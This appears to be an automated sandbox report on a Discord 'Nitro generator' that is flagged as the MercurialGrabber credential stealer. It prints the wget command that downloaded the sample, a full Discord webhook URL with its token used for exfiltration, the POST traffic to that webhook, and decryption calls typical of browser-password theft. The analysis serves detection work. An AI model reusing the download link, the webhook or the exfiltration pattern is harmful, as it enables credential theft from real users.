{"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"}
Source: Process started | Author: James Pemberton / @4A616D6573: Data: Command: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" , CommandLine: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wget.exe, NewProcessName: C:\Windows\SysWOW64\wget.exe, OriginalFileName: C:\Windows\SysWOW64\wget.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6988, ProcessCommandLine: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" , ProcessId: 7096 |
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack | Malware Configuration Extractor: MercurialGrabber {"Webhook Url": "https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY"} |
Source: Yara match | File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR |
Source: Yara match | File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED |
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED |
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Avira: detection malicious, Label: HEUR/AGEN.1143801 |
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Avira: detection malicious, Label: HEUR/AGEN.1143801 |
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BBB20E CryptUnprotectData, | 6_2_00007FFC08BBB20E |
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BBB241 CryptUnprotectData, | 6_2_00007FFC08BBB241 |
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Code function: 6_2_00007FFC08BBB25E CryptUnprotectData, | 6_2_00007FFC08BBB25E |
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC0893AD7A CryptUnprotectData, | 17_2_00007FFC0893AD7A |
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Code function: 17_2_00007FFC0893B25E CryptUnprotectData, | 17_2_00007FFC0893B25E |
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe | Unpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack |
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe | Unpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack |
Source: unknown | HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0 |
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0 |
Source: unknown | HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0 |
Source: unknown | HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0 |
Source: unknown | HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2 |
Source: Malware configuration extractor | URLs: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 704Expect: 100-continue |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 704Expect: 100-continue |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 307Expect: 100-continue |
Source: global traffic | HTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 315Expect: 100-continue |
Source: global traffic | HTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: unknown | HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49742 version: TLS 1.0 |
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.3:49744 version: TLS 1.0 |
Source: unknown | HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.3:49755 version: TLS 1.0 |
Source: unknown | HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.3:49757 version: TLS 1.0 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744 |
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760 |
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758 |
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757 |
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755 |
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750 |
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp | String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;versio |